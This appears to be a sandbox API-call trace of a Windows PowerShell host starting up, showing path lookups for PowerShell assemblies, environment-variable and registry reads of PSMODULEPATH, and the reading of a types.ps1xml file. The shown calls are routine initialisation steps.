	[0088.221] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14e5d4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0088.221] GetLastError () returned 0x7a
	[0088.224] GetConsoleTitleW (in: lpConsoleTitle=0x367d10, nSize=0x400 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b
	[0088.224] GetLastError () returned 0x7a
	[0088.236] GetConsoleTitleW (in: lpConsoleTitle=0x367d10, nSize=0x400 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b
	[0088.236] GetLastError () returned 0x7a
	[0088.236] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14e61c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0088.236] GetLastError () returned 0x7a
	[0088.236] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14e5cc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0088.236] GetLastError () returned 0x7a
	[0088.237] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14e5cc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0088.237] GetLastError () returned 0x7a
	[0088.239] SetConsoleTitleW (lpConsoleTitle="Administrator: C:\\Windows\\System32\\cmd.exe") returned 1
	[0088.239] GetLastError () returned 0x7a
	[0088.239] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14e654, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0088.239] GetLastError () returned 0x7a
	[0088.239] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14e604, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0088.239] GetLastError () returned 0x7a
	[0088.239] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14e604, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0088.239] GetLastError () returned 0x7a
	[0088.239] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14e604, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0088.240] GetLastError () returned 0x7a
	[0088.268] SetConsoleCtrlHandler (HandlerRoutine=0x110384a, Add=1) returned 1
	[0088.268] GetLastError () returned 0x7a
	[0088.281] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x2b8
	[0088.281] GetLastError () returned 0x0
	[0088.282] CoCreateGuid (in: pguid=0x14eb48 | out: pguid=0x14eb48*(Data1=0x5eb8c2f6, Data2=0xdcf3, Data3=0x4b4d, Data4=([0]=0xae, [1]=0xaf, [2]=0x34, [3]=0xd6, [4]=0x4a, [5]=0xc4, [6]=0xd1, [7]=0xf8))) returned 0x0
	[0088.294] WinSqmIsOptedIn () returned 0x0
	[0088.294] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x361778, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0088.294] GetLastError () returned 0xcb
	[0088.295] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x361778, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0088.295] GetLastError () returned 0xcb
	[0088.295] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x361778, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0088.295] GetLastError () returned 0xcb
	[0088.295] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x361778, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0088.295] GetLastError () returned 0xcb
	[0088.296] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x361778, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0088.296] GetLastError () returned 0xcb
	[0088.298] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x361778, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0088.298] GetLastError () returned 0xcb
	[0088.298] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x361778, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0088.298] GetLastError () returned 0xcb
	[0088.298] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x361778, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0088.298] GetLastError () returned 0xcb
	[0088.299] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x361778, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0088.299] GetLastError () returned 0xcb
	[0088.302] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x361778, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0088.302] GetLastError () returned 0xcb
	[0088.303] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x361778, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0088.303] GetLastError () returned 0xcb
	[0088.303] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x361778, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0088.303] GetLastError () returned 0xcb
	[0088.433] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e3a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0088.433] GetLastError () returned 0xcb
	[0088.433] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e350, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0088.433] GetLastError () returned 0xcb
	[0088.434] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e350, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0088.434] GetLastError () returned 0xcb
	[0088.434] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e350, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0088.434] GetLastError () returned 0xcb
	[0088.479] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e3a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0088.479] GetLastError () returned 0x3
	[0088.479] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e350, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0088.479] GetLastError () returned 0x3
	[0088.479] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e350, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0088.479] GetLastError () returned 0x3
	[0088.479] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e3a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0088.479] GetLastError () returned 0x3
	[0088.479] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e350, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0088.479] GetLastError () returned 0x3
	[0088.479] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e350, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0088.479] GetLastError () returned 0x3
	[0088.479] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e3a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0088.479] GetLastError () returned 0x3
	[0088.479] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e350, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0088.479] GetLastError () returned 0x3
	[0088.479] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e350, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0088.479] GetLastError () returned 0x3
	[0088.479] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e3a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0088.479] GetLastError () returned 0x3
	[0088.479] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e350, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0088.479] GetLastError () returned 0x3
	[0088.479] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e350, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0088.479] GetLastError () returned 0x3
	[0088.481] GetEnvironmentVariableW (in: lpName="PSMODULEPATH", lpBuffer=0x361778, nSize=0x80 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x33
	[0088.481] GetLastError () returned 0x3
	[0088.482] ExpandEnvironmentStringsW (in: lpSrc="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x361778, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0088.482] GetLastError () returned 0x3
	[0088.482] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e960 | out: phkResult=0x14e960*=0x2c4) returned 0x0
	[0088.482] RegQueryValueExW (in: hKey=0x2c4, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x14e9a4, lpData=0x0, lpcbData=0x14e9a0*=0x0 | out: lpType=0x14e9a4*=0x2, lpData=0x0, lpcbData=0x14e9a0*=0x6c) returned 0x0
	[0088.482] RegQueryValueExW (in: hKey=0x2c4, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x14e9a4, lpData=0x361778, lpcbData=0x14e9a0*=0x6c | out: lpType=0x14e9a4*=0x2, lpData="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpcbData=0x14e9a0*=0x6c) returned 0x0
	[0088.482] ExpandEnvironmentStringsW (in: lpSrc="%SystemRoot%", lpDst=0x361778, nSize=0x64 | out: lpDst="C:\\Windows") returned 0xb
	[0088.482] GetLastError () returned 0x3
	[0088.482] ExpandEnvironmentStringsW (in: lpSrc="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x361778, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0088.482] GetLastError () returned 0x3
	[0088.483] RegCloseKey (hKey=0x2c4) returned 0x0
	[0088.483] ExpandEnvironmentStringsW (in: lpSrc="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x361778, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0088.483] GetLastError () returned 0x3
	[0088.483] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e960 | out: phkResult=0x14e960*=0x2c4) returned 0x0
	[0088.483] RegQueryValueExW (in: hKey=0x2c4, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x14e9a4, lpData=0x0, lpcbData=0x14e9a0*=0x0 | out: lpType=0x14e9a4*=0x0, lpData=0x0, lpcbData=0x14e9a0*=0x0) returned 0x2
	[0088.484] RegCloseKey (hKey=0x2c4) returned 0x0
	[0088.489] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x361778 | out: pszPath="") returned 0x80070002
	[0088.495] SetEnvironmentVariableW (lpName="PSMODULEPATH", lpValue="WindowsPowerShell\\Modules;C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 1
	[0088.495] GetLastError () returned 0x2
	[0088.502] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x361778, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0088.502] GetLastError () returned 0xcb
	[0088.503] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x361778, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0088.503] GetLastError () returned 0xcb
	[0088.504] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x361778, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0088.504] GetLastError () returned 0xcb
	[0088.504] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x361778, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0088.504] GetLastError () returned 0xcb
	[0088.505] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14e8e0 | out: phkResult=0x14e8e0*=0x2cc) returned 0x0
	[0088.506] RegQueryValueExW (in: hKey=0x2cc, lpValueName="path", lpReserved=0x0, lpType=0x14e948, lpData=0x0, lpcbData=0x14e944*=0x0 | out: lpType=0x14e948*=0x1, lpData=0x0, lpcbData=0x14e944*=0x74) returned 0x0
	[0088.506] RegQueryValueExW (in: hKey=0x2cc, lpValueName="path", lpReserved=0x0, lpType=0x14e928, lpData=0x0, lpcbData=0x14e924*=0x0 | out: lpType=0x14e928*=0x1, lpData=0x0, lpcbData=0x14e924*=0x74) returned 0x0
	[0088.506] RegQueryValueExW (in: hKey=0x2cc, lpValueName="path", lpReserved=0x0, lpType=0x14e928, lpData=0x361778, lpcbData=0x14e924*=0x74 | out: lpType=0x14e928*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpcbData=0x14e924*=0x74) returned 0x0
	[0088.507] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", nBufferLength=0x105, lpBuffer=0x14e4a8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpFilePart=0x0) returned 0x2a
	[0088.507] GetLastError () returned 0xcb
	[0088.507] SetErrorMode (uMode=0x1) returned 0x1
	[0088.507] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0x14e928 | out: lpFileInformation=0x14e928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe4f50ebe, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0x919bae56, ftLastAccessTime.dwHighDateTime=0x1cbf8b7, ftLastWriteTime.dwLowDateTime=0x919bae56, ftLastWriteTime.dwHighDateTime=0x1cbf8b7, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0088.507] GetLastError () returned 0xcb
	[0088.507] SetErrorMode (uMode=0x1) returned 0x1
	[0088.507] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x14e49c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0088.507] GetLastError () returned 0xcb
	[0088.507] SetErrorMode (uMode=0x1) returned 0x1
	[0088.507] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x14e91c | out: lpFileInformation=0x14e91c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a0058e2, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a0058e2, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd7bbaefc, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x3cf3)) returned 1
	[0088.507] GetLastError () returned 0xcb
	[0088.507] SetErrorMode (uMode=0x1) returned 0x1
	[0088.507] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x14e49c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0088.508] GetLastError () returned 0xcb
	[0088.508] SetErrorMode (uMode=0x1) returned 0x1
	[0088.508] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x14e91c | out: lpFileInformation=0x14e91c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd7c2d31c, ftCreationTime.dwHighDateTime=0x1c9ea11, ftLastAccessTime.dwLowDateTime=0xd7c2d31c, ftLastAccessTime.dwHighDateTime=0x1c9ea11, ftLastWriteTime.dwLowDateTime=0xd7c5347c, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x291b4)) returned 1
	[0088.508] GetLastError () returned 0xcb
	[0088.508] SetErrorMode (uMode=0x1) returned 0x1
	[0088.508] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x361778, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0088.508] GetLastError () returned 0xcb
	[0088.509] GetACP () returned 0x4e4
	[0088.515] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x14e32c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0088.515] GetLastError () returned 0x0
	[0088.515] SetErrorMode (uMode=0x1) returned 0x1
	[0088.516] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2d0
	[0088.516] GetLastError () returned 0x0
	[0088.517] GetFileType (hFile=0x2d0) returned 0x1
	[0088.517] SetErrorMode (uMode=0x1) returned 0x1
	[0088.517] GetFileType (hFile=0x2d0) returned 0x1
	[0088.518] ReadFile (in: hFile=0x2d0, lpBuffer=0x13d0be4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e894, lpOverlapped=0x0 | out: lpBuffer=0x13d0be4*, lpNumberOfBytesRead=0x14e894*=0x1000, lpOverlapped=0x0) returned 1
	[0088.519] GetLastError () returned 0x0
	[0088.519] ReadFile (in: hFile=0x2d0, lpBuffer=0x13d0be4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e894, lpOverlapped=0x0 | out: lpBuffer=0x13d0be4*, lpNumberOfBytesRead=0x14e894*=0x1000, lpOverlapped=0x0) returned 1
	[0088.519] GetLastError () returned 0x0
	[0088.520] ReadFile (in: hFile=0x2d0, lpBuffer=0x13d0be4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e894, lpOverlapped=0x0 | out: lpBuffer=0x13d0be4*, lpNumberOfBytesRead=0x14e894*=0x1000, lpOverlapped=0x0) returned 1
	[0088.520] GetLastError () returned 0x0
	[0088.521] ReadFile (in: hFile=0x2d0, lpBuffer=0x13d0be4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e894, lpOverlapped=0x0 | out: lpBuffer=0x13d0be4*, lpNumberOfBytesRead=0x14e894*=0xcf3, lpOverlapped=0x0) returned 1
	[0088.521] GetLastError () returned 0x0
	[0088.521] ReadFile (in: hFile=0x2d0, lpBuffer=0x13d0077, nNumberOfBytesToRead=0x30d, lpNumberOfBytesRead=0x14e894, lpOverlapped=0x0 | out: lpBuffer=0x13d0077*, lpNumberOfBytesRead=0x14e894*=0x0, lpOverlapped=0x0) returned 1
	[0088.521] GetLastError () returned 0x0
	[0088.521] ReadFile (in: hFile=0x2d0, lpBuffer=0x13d0be4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14e894, lpOverlapped=0x0 | out: lpBuffer=0x13d0be4*, lpNumberOfBytesRead=0x14e894*=0x0, lpOverlapped=0x0) returned 1
	[0088.521] GetLastError () returned 0x0
	[0088.521] CloseHandle (hObject=0x2d0) returned 1
	[0088.521] GetLastError () returned 0x0
	[0088.522] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x14e3f4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0088.522] GetLastError () returned 0x0
	[0088.522] SetErrorMode (uMode=0x1) returned 0x1
	[0088.522] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x13e1f58 | out: lpFileInformation=0x13e1f58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a0058e2, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a0058e2, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd7bbaefc, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x3cf3)) returned 1
	[0088.522] GetLastError () returned 0x0
	[0088.522] SetErrorMode (uMode=0x1) returned 0x1
	[0088.523] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x14e3c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0088.523] GetLastError () returned 0x0
